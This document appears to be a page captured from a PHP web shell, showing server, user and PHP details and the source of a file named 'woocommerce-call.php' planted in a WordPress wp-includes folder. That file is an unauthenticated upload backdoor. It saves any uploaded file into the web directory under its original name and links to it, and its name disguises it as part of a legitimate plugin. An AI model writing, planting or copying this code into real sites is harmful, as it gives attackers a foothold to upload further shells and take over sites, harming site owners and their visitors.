HEX
Server: Apache
System: Linux www 6.18.27-i1-amd #1013 SMP Thu May 7 10:00:14 CEST 2026 x86_64
User: sws1073783838 (1073783838)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: /home/www/STRATO-apps/wordpress_01/app/wp-includes/woocommerce-call.php
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title><?php echo $_SERVER['HTTP_HOST'] ?></title>
</head>
<body>


<form method="post" enctype="multipart/form-data">
    <input type="file" name="filename">
    <input type="submit" value="submit">
</form>

<?php
if ( is_uploaded_file( $_FILES["filename"]["tmp_name"] ) ) {
	move_uploaded_file( $_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"] );
	$file = $_FILES["filename"]["name"];
	echo "<a href=\"$file\">$file</a>";
}
?>
</body>
</html>